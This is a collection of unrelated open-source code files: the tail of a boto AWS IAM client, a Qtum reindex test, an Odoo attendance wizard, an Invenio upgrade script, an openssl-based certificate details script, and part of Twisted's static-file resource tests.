:param role_name: Name of the role associated with the policy.
"""
return self.get_response('GetRole', {'RoleName': role_name})
def get_role_policy(self, role_name, policy_name):
"""
Retrieves the specified policy document for the specified role.
:type role_name: string
:param role_name: Name of the role associated with the policy.
:type policy_name: string
:param policy_name: Name of the policy to get.
"""
return self.get_response('GetRolePolicy',
{'RoleName': role_name,
'PolicyName': policy_name})
def list_instance_profiles(self, path_prefix=None, marker=None,
max_items=None):
"""
Lists the instance profiles that have the specified path prefix. If
there are none, the action returns an empty list.
:type path_prefix: string
:param path_prefix: The path prefix for filtering the results. For
example: /application_abc/component_xyz/, which would get all
instance profiles whose path starts with
/application_abc/component_xyz/.
:type marker: string
:param marker: Use this parameter only when paginating results, and
only in a subsequent request after you've received a response
where the results are truncated. Set it to the value of the
Marker element in the response you just received.
:type max_items: int
:param max_items: Use this parameter only when paginating results to
indicate the maximum number of user names you want in the response.
"""
params = {}
if path_prefix is not None:
params['PathPrefix'] = path_prefix
if marker is not None:
params['Marker'] = marker
if max_items is not None:
params['MaxItems'] = max_items
return self.get_response('ListInstanceProfiles', params,
list_marker='InstanceProfiles')
def list_instance_profiles_for_role(self, role_name, marker=None,
max_items=None):
"""
Lists the instance profiles that have the specified associated role. If
there are none, the action returns an empty list.
:type role_name: string
:param role_name: The name of the role to list instance profiles for.
:type marker: string
:param marker: Use this parameter only when paginating results, and
only in a subsequent request after you've received a response
where the results are truncated. Set it to the value of the
Marker element in the response you just received.
:type max_items: int
:param max_items: Use this parameter only when paginating results to
indicate the maximum number of user names you want in the response.
"""
params = {'RoleName': role_name}
if marker is not None:
params['Marker'] = marker
if max_items is not None:
params['MaxItems'] = max_items
return self.get_response('ListInstanceProfilesForRole', params,
list_marker='InstanceProfiles')
def list_role_policies(self, role_name, marker=None, max_items=None):
"""
Lists the names of the policies associated with the specified role. If
there are none, the action returns an empty list.
:type role_name: string
:param role_name: The name of the role to list policies for.
:type marker: string
:param marker: Use this parameter only when paginating results, and
only in a subsequent request after you've received a response
where the results are truncated. Set it to the value of the
marker element in the response you just received.
:type max_items: int
:param max_items: Use this parameter only when paginating results to
indicate the maximum number of user names you want in the response.
"""
params = {'RoleName': role_name}
if marker is not None:
params['Marker'] = marker
if max_items is not None:
params['MaxItems'] = max_items
return self.get_response('ListRolePolicies', params,
list_marker='PolicyNames')
def list_roles(self, path_prefix=None, marker=None, max_items=None):
"""
Lists the roles that have the specified path prefix. If there are none,
the action returns an empty list.
:type path_prefix: string
:param path_prefix: The path prefix for filtering the results.
:type marker: string
:param marker: Use this parameter only when paginating results, and
only in a subsequent request after you've received a response
where the results are truncated. Set it to the value of the
marker element in the response you just received.
:type max_items: int
:param max_items: Use this parameter only when paginating results to
indicate the maximum number of user names you want in the response.
"""
params = {}
if path_prefix is not None:
params['PathPrefix'] = path_prefix
if marker is not None:
params['Marker'] = marker
if max_items is not None:
params['MaxItems'] = max_items
return self.get_response('ListRoles', params, list_marker='Roles')
def put_role_policy(self, role_name, policy_name, policy_document):
"""
Adds (or updates) a policy document associated with the specified role.
:type role_name: string
:param role_name: Name of the role to associate the policy with.
:type policy_name: string
:param policy_name: Name of the policy document.
:type policy_document: string
:param policy_document: The policy document.
"""
return self.get_response('PutRolePolicy',
{'RoleName': role_name,
'PolicyName': policy_name,
'PolicyDocument': policy_document})
def remove_role_from_instance_profile(self, instance_profile_name,
role_name):
"""
Removes the specified role from the specified instance profile.
:type instance_profile_name: string
:param instance_profile_name: Name of the instance profile to update.
:type role_name: string
:param role_name: Name of the role to remove.
"""
return self.get_response('RemoveRoleFromInstanceProfile',
{'InstanceProfileName': instance_profile_name,
'RoleName': role_name})
def update_assume_role_policy(self, role_name, policy_document):
"""
Updates the policy that grants an entity permission to assume a role.
Currently, only an Amazon EC2 instance can assume a role.
:type role_name: string
:param role_name: Name of the role to update.
:type policy_document: string
:param policy_document: The policy that grants an entity permission to
assume the role.
"""
return self.get_response('UpdateAssumeRolePolicy',
{'RoleName': role_name,
'PolicyDocument': policy_document})
def create_saml_provider(self, saml_metadata_document, name):
"""
Creates an IAM entity to describe an identity provider (IdP)
that supports SAML 2.0.
The SAML provider that you create with this operation can be
used as a principal in a role's trust policy to establish a
trust relationship between AWS and a SAML identity provider.
You can create an IAM role that supports Web-based single
sign-on (SSO) to the AWS Management Console or one that
supports API access to AWS.
When you create the SAML provider, you upload an a SAML
metadata document that you get from your IdP and that includes
the issuer's name, expiration information, and keys that can
be used to validate the SAML authentication response
(assertions) that are received from the IdP. You must generate
the metadata document using the identity management software
that is used as your organization's IdP.
This operation requires `Signature Version 4`_.
For more information, see `Giving Console Access Using SAML`_
and `Creating Temporary Security Credentials for SAML
Federation`_ in the Using Temporary Credentials guide.
:type saml_metadata_document: string
:param saml_metadata_document: An XML document generated by an identity
provider (IdP) that supports SAML 2.0. The document includes the
issuer's name, expiration information, and keys that can be used to
validate the SAML authentication response (assertions) that are
received from the IdP. You must generate the metadata document
using the identity management software that is used as your
organization's IdP.
For more information, see `Creating Temporary Security Credentials for
SAML Federation`_ in the Using Temporary Security Credentials
guide.
:type name: string
:param name: The name of the provider to create.
"""
params = {
'SAMLMetadataDocument': saml_metadata_document,
'Name': name,
}
return self.get_response('CreateSAMLProvider', params)
def list_saml_providers(self):
"""
Lists the SAML providers in the account.
This operation requires `Signature Version 4`_.
"""
return self.get_response('ListSAMLProviders', {}, list_marker='SAMLProviderList')
def get_saml_provider(self, saml_provider_arn):
"""
Returns the SAML provider metadocument that was uploaded when
the provider was created or updated.
This operation requires `Signature Version 4`_.
:type saml_provider_arn: string
:param saml_provider_arn: The Amazon Resource Name (ARN) of the SAML
provider to get information about.
"""
params = {'SAMLProviderArn': saml_provider_arn}
return self.get_response('GetSAMLProvider', params)
def update_saml_provider(self, saml_provider_arn, saml_metadata_document):
"""
Updates the metadata document for an existing SAML provider.
This operation requires `Signature Version 4`_.
:type saml_provider_arn: string
:param saml_provider_arn: The Amazon Resource Name (ARN) of the SAML
provider to update.
:type saml_metadata_document: string
:param saml_metadata_document: An XML document generated by an identity
provider (IdP) that supports SAML 2.0. The document includes the
issuer's name, expiration information, and keys that can be used to
validate the SAML authentication response (assertions) that are
received from the IdP. You must generate the metadata document
using the identity management software that is used as your
organization's IdP.
"""
params = {
'SAMLMetadataDocument': saml_metadata_document,
'SAMLProviderArn': saml_provider_arn,
}
return self.get_response('UpdateSAMLProvider', params)
def delete_saml_provider(self, saml_provider_arn):
"""
Deletes a SAML provider.
Deleting the provider does not update any roles that reference
the SAML provider as a principal in their trust policies. Any
attempt to assume a role that references a SAML provider that
has been deleted will fail.
This operation requires `Signature Version 4`_.
:type saml_provider_arn: string
:param saml_provider_arn: The Amazon Resource Name (ARN) of the SAML
provider to delete.
"""
params = {'SAMLProviderArn': saml_provider_arn}
return self.get_response('DeleteSAMLProvider', params)
#
# IAM Reports
#
def generate_credential_report(self):
"""
Generates a credential report for an account
A new credential report can only be generated every 4 hours. If one
hasn't been generated in the last 4 hours then get_credential_report
will error when called
"""
params = {}
return self.get_response('GenerateCredentialReport', params)
def get_credential_report(self):
"""
Retrieves a credential report for an account
A report must have been generated in the last 4 hours to succeed.
The report is returned as a base64 encoded blob within the response.
"""
params = {}
return self.get_response('GetCredentialReport', params)
def create_virtual_mfa_device(self, path, device_name):
"""
Creates a new virtual MFA device for the AWS account.
After creating the virtual MFA, use enable-mfa-device to
attach the MFA device to an IAM user.
:type path: string
:param path: The path for the virtual MFA device.
:type device_name: string
:param device_name: The name of the virtual MFA device.
Used with path to uniquely identify a virtual MFA device.
"""
params = {
'Path': path,
'VirtualMFADeviceName': device_name
}
return self.get_response('CreateVirtualMFADevice', params)
| mit |
qtumproject/qtum | test/functional/feature_reindex.py | 32 | 1414 | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test running bitcoind with -reindex and -reindex-chainstate options.
- Start a single node and generate 3 blocks.
- Stop the node and restart it with -reindex. Verify that the node has reindexed up to block 3.
- Stop the node and restart it with -reindex-chainstate. Verify that the node has reindexed up to block 3.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import wait_until
class ReindexTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def reindex(self, justchainstate=False):
self.nodes[0].generatetoaddress(3, self.nodes[0].get_deterministic_priv_key().address)
blockcount = self.nodes[0].getblockcount()
self.stop_nodes()
extra_args = [["-reindex-chainstate" if justchainstate else "-reindex"]]
self.start_nodes(extra_args)
wait_until(lambda: self.nodes[0].getblockcount() == blockcount)
self.log.info("Success")
def run_test(self):
self.reindex(False)
self.reindex(True)
self.reindex(False)
self.reindex(True)
if __name__ == '__main__':
ReindexTest().main()
| mit |
rruebner/odoo | addons/hr_attendance/wizard/hr_attendance_error.py | 377 | 2896 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
from openerp.tools.translate import _
class hr_attendance_error(osv.osv_memory):
_name = 'hr.attendance.error'
_description = 'Print Error Attendance Report'
_columns = {
'init_date': fields.date('Starting Date', required=True),
'end_date': fields.date('Ending Date', required=True),
'max_delay': fields.integer('Max. Delay (Min)', required=True)
}
_defaults = {
'init_date': lambda *a: time.strftime('%Y-%m-%d'),
'end_date': lambda *a: time.strftime('%Y-%m-%d'),
'max_delay': 120,
}
def print_report(self, cr, uid, ids, context=None):
emp_ids = []
data_error = self.read(cr, uid, ids, context=context)[0]
date_from = data_error['init_date']
date_to = data_error['end_date']
cr.execute("SELECT id FROM hr_attendance WHERE employee_id IN %s AND to_char(name,'YYYY-mm-dd')<=%s AND to_char(name,'YYYY-mm-dd')>=%s AND action IN %s ORDER BY name" ,(tuple(context['active_ids']), date_to, date_from, tuple(['sign_in','sign_out'])))
attendance_ids = [x[0] for x in cr.fetchall()]
if not attendance_ids:
raise osv.except_osv(_('No Data Available!'), _('No records are found for your selection!'))
attendance_records = self.pool.get('hr.attendance').browse(cr, uid, attendance_ids, context=context)
for rec in attendance_records:
if rec.employee_id.id not in emp_ids:
emp_ids.append(rec.employee_id.id)
data_error['emp_ids'] = emp_ids
datas = {
'ids': [],
'model': 'hr.employee',
'form': data_error
}
return self.pool['report'].get_action(
cr, uid, [], 'hr_attendance.report_attendanceerrors', data=datas, context=context
)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
dset0x/invenio | invenio/modules/oaiharvester/upgrades/oaiharvester_2014_09_09_initial.py | 18 | 2477 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2014 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Initial upgrade script from Invenio v1.x to v2.0."""
import sqlalchemy as sa
import warnings
from invenio.modules.upgrader.api import op
from sqlalchemy.exc import OperationalError
from invenio.legacy.dbquery import run_sql
depends_on = []
def info():
return "Add workflows column and drop frequency."
def do_upgrade():
"""Implement your upgrades here."""
try:
op.add_column(
'oaiHARVEST',
sa.Column(
'workflows',
sa.String(length=255),
server_default='',
nullable=False
)
)
except OperationalError:
op.alter_column(
'oaiHARVEST',
'workflows',
existing_type=sa.String(length=255),
nullable=False,
server_default=''
)
# Set default workflow with backwards compatibility for those who have none.
all_data_objects = run_sql("SELECT id, workflows FROM oaiHARVEST")
for object_id, workflows in all_data_objects:
if not workflows:
run_sql("UPDATE oaiHARVEST set workflows=%s WHERE id=%s",
("oaiharvest_harvest_repositories", str(object_id)))
try:
op.drop_column('oaiHARVEST', 'frequency')
except OperationalError as err:
warnings.warn(
"*** Error removing 'oaiHARVEST.frequency' column: {0} ***".format(
str(err)
)
)
def estimate():
"""Estimate running time of upgrade in seconds (optional)."""
return 1
def pre_upgrade():
"""Run pre-upgrade checks (optional)."""
pass
def post_upgrade():
"""Run post-upgrade checks (optional)."""
pass
| gpl-2.0 |
PSJoshi/python_scripts | certificate-details.py | 1 | 3377 | #!/usr/bin/env python
import subprocess
import logging
import os
import sys
from urlparse import urlparse
"""
# use of openssl for ssl certificate details
psj@psj-desktop:~/Downloads/nmap-6.40$ openssl s_client -showcerts -connect google.com:443</dev/null
Certificate validity:
psj@psj-desktop:~/Downloads/nmap-6.40$ openssl s_client -showcerts -connect google.com:443</dev/null |openssl x509 -noout -dates
Issuer details:
psj@psj-desktop:~/Downloads/nmap-6.40$ openssl s_client -showcerts -connect google.com:443</dev/null |openssl x509 -noout -issuer
Subject:
psj@psj-desktop:~/Downloads/nmap-6.40$ openssl s_client -showcerts -connect google.com:443</dev/null |openssl x509 -noout -subject
SHA-1 Fingerprint:
psj@psj-desktop:~/Downloads/nmap-6.40$ openssl s_client -showcerts -connect google.com:443</dev/null |openssl x509 -noout -fingerprint
# use NMAP for ssl related details
psj@psj-desktop:~/Downloads/nmap-6.40$ export SET NMAPDIR=/home/psj/Downloads/nmap-6.40/
Get SSL certificate details
psj@psj-desktop:~/Downloads/nmap-6.40$ nmap google.com -PN -T4 -p 443 --script=ssl-cert
Get cipher details
psj@psj-desktop:~/Downloads/nmap-6.40$ nmap google.com -PN -T4 -p 443 --script=ssl-enum-ciphers
"""
# logging
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
logger = logging.getLogger(__name__)
def command_response(domain,cert_command):
cmd = '/usr/bin/openssl s_client -showcerts -connect %s:443</dev/null |openssl x509 -noout -%s' %(domain,cert_command)
response = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
process_response = response.communicate()[0]
return process_response
def get_dates(domain):
start = end = None
domain_response = command_response(domain,'dates')
if domain_response:
split_response = domain_response.split('\n')[:-1]
logger.info("Issue date: %s Expiry date: %s "%(split_response[0],split_response[1]))
start,end = split_response[0].split('=')[1],split_response[1].split('=')[1]
return start,end
def get_issuer(domain):
issuer = None
domain_response = command_response(domain,'issuer')
if domain_response:
split_response = domain_response.split('\n')[:-1]
issuer = split_response[0]
return issuer
def get_subject(domain):
subject = None
domain_response = command_response(domain,'subject')
if domain_response:
split_response = domain_response.split('\n')[:-1]
subject = split_response[0]
return subject
def get_fingerprint(domain):
fingerprint = None
domain_response = command_response(domain,'fingerprint')
if domain_response:
split_response = domain_response.split('\n')[:-1]
fingerprint = split_response[0]
return fingerprint
if __name__ == '__main__':
# extract domain from url
url_details = urlparse('http://www.google.com')
domain = url_details.netloc
# check if openssl is installed or not
if os.path.isfile('/usr/bin/openssl'):
issue_date,expiry_date = get_dates(domain)
logger.info("Certificate issue date:%s" % issue_date)
logger.info("Certificate expiry date:%s" % expiry_date)
else:
logger.info("Openssl package is not present on the system. The program can not continue... Quitting...")
issuer = get_issuer(domain)
logger.info("Certificate issuer - %s" %issuer)
sub = get_subject(domain)
logger.info("Certificate subject - %s" %sub)
fingerprint = get_fingerprint(domain)
logger.info("Certificate fingerprint - %s" %fingerprint)
| apache-2.0 |
msmolens/VTK | ThirdParty/Twisted/twisted/web/test/test_static.py | 28 | 56293 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.static}.
"""
import inspect
import mimetypes
import os
import re
import StringIO
from zope.interface.verify import verifyObject
from twisted.internet import abstract, interfaces
from twisted.python.runtime import platform
from twisted.python.filepath import FilePath
from twisted.python import log
from twisted.trial.unittest import TestCase
from twisted.web import static, http, script, resource
from twisted.web.server import UnsupportedMethod
from twisted.web.test.test_web import DummyRequest
from twisted.web.test._util import _render
class StaticDataTests(TestCase):
"""
Tests for L{Data}.
"""
def test_headRequest(self):
"""
L{Data.render} returns an empty response body for a I{HEAD} request.
"""
data = static.Data("foo", "bar")
request = DummyRequest([''])
request.method = 'HEAD'
d = _render(data, request)
def cbRendered(ignored):
self.assertEqual(''.join(request.written), "")
d.addCallback(cbRendered)
return d
def test_invalidMethod(self):
"""
L{Data.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
"""
data = static.Data("foo", "bar")
request = DummyRequest([''])
request.method = 'POST'
self.assertRaises(UnsupportedMethod, data.render, request)
class StaticFileTests(TestCase):
"""
Tests for the basic behavior of L{File}.
"""
def _render(self, resource, request):
return _render(resource, request)
def test_invalidMethod(self):
"""
L{File.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
"""
request = DummyRequest([''])
request.method = 'POST'
path = FilePath(self.mktemp())
path.setContent("foo")
file = static.File(path.path)
self.assertRaises(UnsupportedMethod, file.render, request)
def test_notFound(self):
"""
If a request is made which encounters a L{File} before a final segment
which does not correspond to any file in the path the L{File} was
created with, a not found response is sent.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest(['foobar'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
def test_emptyChild(self):
"""
The C{''} child of a L{File} which corresponds to a directory in the
filesystem is a L{DirectoryLister}.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([''])
child = resource.getChildForRequest(file, request)
self.assertIsInstance(child, static.DirectoryLister)
self.assertEqual(child.path, base.path)
def test_securityViolationNotFound(self):
"""
If a request is made which encounters a L{File} before a final segment
which cannot be looked up in the filesystem due to security
considerations, a not found response is sent.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest(['..'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
def test_forbiddenResource(self):
"""
If the file in the filesystem which would satisfy a request cannot be
read, L{File.render} sets the HTTP response code to I{FORBIDDEN}.
"""
base = FilePath(self.mktemp())
base.setContent('')
# Make sure we can delete the file later.
self.addCleanup(base.chmod, 0700)
# Get rid of our own read permission.
base.chmod(0)
file = static.File(base.path)
request = DummyRequest([''])
d = self._render(file, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 403)
d.addCallback(cbRendered)
return d
if platform.isWindows():
test_forbiddenResource.skip = "Cannot remove read permission on Windows"
def test_indexNames(self):
"""
If a request is made which encounters a L{File} before a final empty
segment, a file in the L{File} instance's C{indexNames} list which
exists in the path the L{File} was created with is served as the
response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent("baz")
file = static.File(base.path)
file.indexNames = ['foo.bar']
request = DummyRequest([''])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(''.join(request.written), 'baz')
self.assertEqual(request.outgoingHeaders['content-length'], '3')
d.addCallback(cbRendered)
return d
def test_staticFile(self):
"""
If a request is made which encounters a L{File} before a final segment
which names a file in the path the L{File} was created with, that file
is served as the response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent("baz")
file = static.File(base.path)
request = DummyRequest(['foo.bar'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(''.join(request.written), 'baz')
self.assertEqual(request.outgoingHeaders['content-length'], '3')
d.addCallback(cbRendered)
return d
def test_staticFileDeletedGetChild(self):
"""
A L{static.File} created for a directory which does not exist should
return childNotFound from L{static.File.getChild}.
"""
staticFile = static.File(self.mktemp())
request = DummyRequest(['foo.bar'])
child = staticFile.getChild("foo.bar", request)
self.assertEqual(child, staticFile.childNotFound)
def test_staticFileDeletedRender(self):
"""
A L{static.File} created for a file which does not exist should render
its C{childNotFound} page.
"""
staticFile = static.File(self.mktemp())
request = DummyRequest(['foo.bar'])
request2 = DummyRequest(['foo.bar'])
d = self._render(staticFile, request)
d2 = self._render(staticFile.childNotFound, request2)
def cbRendered2(ignored):
def cbRendered(ignored):
self.assertEqual(''.join(request.written),
''.join(request2.written))
d.addCallback(cbRendered)
return d
d2.addCallback(cbRendered2)
return d2
def test_headRequest(self):
"""
L{static.File.render} returns an empty response body for I{HEAD}
requests.
"""
path = FilePath(self.mktemp())
path.setContent("foo")
file = static.File(path.path)
request = DummyRequest([''])
request.method = 'HEAD'
d = _render(file, request)
def cbRendered(ignored):
self.assertEqual("".join(request.written), "")
d.addCallback(cbRendered)
return d
def test_processors(self):
"""
If a request is made which encounters a L{File} before a final segment
which names a file with an extension which is in the L{File}'s
C{processors} mapping, the processor associated with that extension is
used to serve the response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(
"from twisted.web.static import Data\n"
"resource = Data('dynamic world','text/plain')\n")
file = static.File(base.path)
file.processors = {'.bar': script.ResourceScript}
request = DummyRequest(["foo.bar"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(''.join(request.written), 'dynamic world')
self.assertEqual(request.outgoingHeaders['content-length'], '13')
d.addCallback(cbRendered)
return d
def test_ignoreExt(self):
"""
The list of ignored extensions can be set by passing a value to
L{File.__init__} or by calling L{File.ignoreExt} later.
"""
file = static.File(".")
self.assertEqual(file.ignoredExts, [])
file.ignoreExt(".foo")
file.ignoreExt(".bar")
self.assertEqual(file.ignoredExts, [".foo", ".bar"])
file = static.File(".", ignoredExts=(".bar", ".baz"))
self.assertEqual(file.ignoredExts, [".bar", ".baz"])
def test_ignoredExtensionsIgnored(self):
"""
A request for the I{base} child of a L{File} succeeds with a resource
for the I{base<extension>} file in the path the L{File} was created
with if such a file exists and the L{File} has been configured to
ignore the I{<extension>} extension.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child('foo.bar').setContent('baz')
base.child('foo.quux').setContent('foobar')
file = static.File(base.path, ignoredExts=(".bar",))
request = DummyRequest(["foo"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(''.join(request.written), 'baz')
d.addCallback(cbRendered)
return d
class StaticMakeProducerTests(TestCase):
"""
Tests for L{File.makeProducer}.
"""
def makeResourceWithContent(self, content, type=None, encoding=None):
"""
Make a L{static.File} resource that has C{content} for its content.
@param content: The bytes to use as the contents of the resource.
@param type: Optional value for the content type of the resource.
"""
fileName = self.mktemp()
fileObject = open(fileName, 'w')
fileObject.write(content)
fileObject.close()
resource = static.File(fileName)
resource.encoding = encoding
resource.type = type
return resource
def contentHeaders(self, request):
"""
Extract the content-* headers from the L{DummyRequest} C{request}.
This returns the subset of C{request.outgoingHeaders} of headers that
start with 'content-'.
"""
contentHeaders = {}
for k, v in request.outgoingHeaders.iteritems():
if k.startswith('content-'):
contentHeaders[k] = v
return contentHeaders
def test_noRangeHeaderGivesNoRangeStaticProducer(self):
"""
makeProducer when no Range header is set returns an instance of
NoRangeStaticProducer.
"""
resource = self.makeResourceWithContent('')
request = DummyRequest([])
producer = resource.makeProducer(request, resource.openForReading())
self.assertIsInstance(producer, static.NoRangeStaticProducer)
def test_noRangeHeaderSets200OK(self):
"""
makeProducer when no Range header is set sets the responseCode on the
request to 'OK'.
"""
resource = self.makeResourceWithContent('')
request = DummyRequest([])
resource.makeProducer(request, resource.openForReading())
self.assertEqual(http.OK, request.responseCode)
def test_noRangeHeaderSetsContentHeaders(self):
"""
makeProducer when no Range header is set sets the Content-* headers
for the response.
"""
length = 123
contentType = "text/plain"
contentEncoding = 'gzip'
resource = self.makeResourceWithContent(
'a'*length, type=contentType, encoding=contentEncoding)
request = DummyRequest([])
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
{'content-type': contentType, 'content-length': str(length),
'content-encoding': contentEncoding},
self.contentHeaders(request))
def test_singleRangeGivesSingleRangeStaticProducer(self):
"""
makeProducer when the Range header requests a single byte range
returns an instance of SingleRangeStaticProducer.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3'
resource = self.makeResourceWithContent('abcdef')
producer = resource.makeProducer(request, resource.openForReading())
self.assertIsInstance(producer, static.SingleRangeStaticProducer)
def test_singleRangeSets206PartialContent(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the response code on the request to 'Partial Content'.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3'
resource = self.makeResourceWithContent('abcdef')
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
def test_singleRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3'
contentType = "text/plain"
contentEncoding = 'gzip'
resource = self.makeResourceWithContent('abcdef', type=contentType, encoding=contentEncoding)
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
{'content-type': contentType, 'content-encoding': contentEncoding,
'content-range': 'bytes 1-3/6', 'content-length': '3'},
self.contentHeaders(request))
def test_singleUnsatisfiableRangeReturnsSingleRangeStaticProducer(self):
"""
makeProducer still returns an instance of L{SingleRangeStaticProducer}
when the Range header requests a single unsatisfiable byte range.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=4-10'
resource = self.makeResourceWithContent('abc')
producer = resource.makeProducer(request, resource.openForReading())
self.assertIsInstance(producer, static.SingleRangeStaticProducer)
def test_singleUnsatisfiableRangeSets416ReqestedRangeNotSatisfiable(self):
"""
makeProducer sets the response code of the request to of 'Requested
Range Not Satisfiable' when the Range header requests a single
unsatisfiable byte range.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=4-10'
resource = self.makeResourceWithContent('abc')
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
http.REQUESTED_RANGE_NOT_SATISFIABLE, request.responseCode)
def test_singleUnsatisfiableRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, unsatisfiable
byte range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=4-10'
contentType = "text/plain"
resource = self.makeResourceWithContent('abc', type=contentType)
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
{'content-type': 'text/plain', 'content-length': '0',
'content-range': 'bytes */3'},
self.contentHeaders(request))
def test_singlePartiallyOverlappingRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single byte range that
partly overlaps the resource sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=2-10'
contentType = "text/plain"
resource = self.makeResourceWithContent('abc', type=contentType)
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
{'content-type': 'text/plain', 'content-length': '1',
'content-range': 'bytes 2-2/3'},
self.contentHeaders(request))
def test_multipleRangeGivesMultipleRangeStaticProducer(self):
"""
makeProducer when the Range header requests a single byte range
returns an instance of MultipleRangeStaticProducer.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3,5-6'
resource = self.makeResourceWithContent('abcdef')
producer = resource.makeProducer(request, resource.openForReading())
self.assertIsInstance(producer, static.MultipleRangeStaticProducer)
def test_multipleRangeSets206PartialContent(self):
"""
makeProducer when the Range header requests a multiple satisfiable
byte ranges sets the response code on the request to 'Partial
Content'.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3,5-6'
resource = self.makeResourceWithContent('abcdef')
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
def test_mutipleRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3,5-6'
resource = self.makeResourceWithContent(
'abcdefghijkl', encoding='gzip')
producer = resource.makeProducer(request, resource.openForReading())
contentHeaders = self.contentHeaders(request)
# The only content-* headers set are content-type and content-length.
self.assertEqual(
set(['content-length', 'content-type']),
set(contentHeaders.keys()))
# The content-length depends on the boundary used in the response.
expectedLength = 5
for boundary, offset, size in producer.rangeInfo:
expectedLength += len(boundary)
self.assertEqual(expectedLength, contentHeaders['content-length'])
# Content-type should be set to a value indicating a multipart
# response and the boundary used to separate the parts.
self.assertIn('content-type', contentHeaders)
contentType = contentHeaders['content-type']
self.assertNotIdentical(
None, re.match(
'multipart/byteranges; boundary="[^"]*"\Z', contentType))
# Content-encoding is not set in the response to a multiple range
# response, which is a bit wussy but works well enough with the way
# static.File does content-encodings...
self.assertNotIn('content-encoding', contentHeaders)
def test_multipleUnsatisfiableRangesReturnsMultipleRangeStaticProducer(self):
"""
makeProducer still returns an instance of L{SingleRangeStaticProducer}
when the Range header requests multiple ranges, none of which are
satisfiable.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=10-12,15-20'
resource = self.makeResourceWithContent('abc')
producer = resource.makeProducer(request, resource.openForReading())
self.assertIsInstance(producer, static.MultipleRangeStaticProducer)
def test_multipleUnsatisfiableRangesSets416ReqestedRangeNotSatisfiable(self):
"""
makeProducer sets the response code of the request to of 'Requested
Range Not Satisfiable' when the Range header requests multiple ranges,
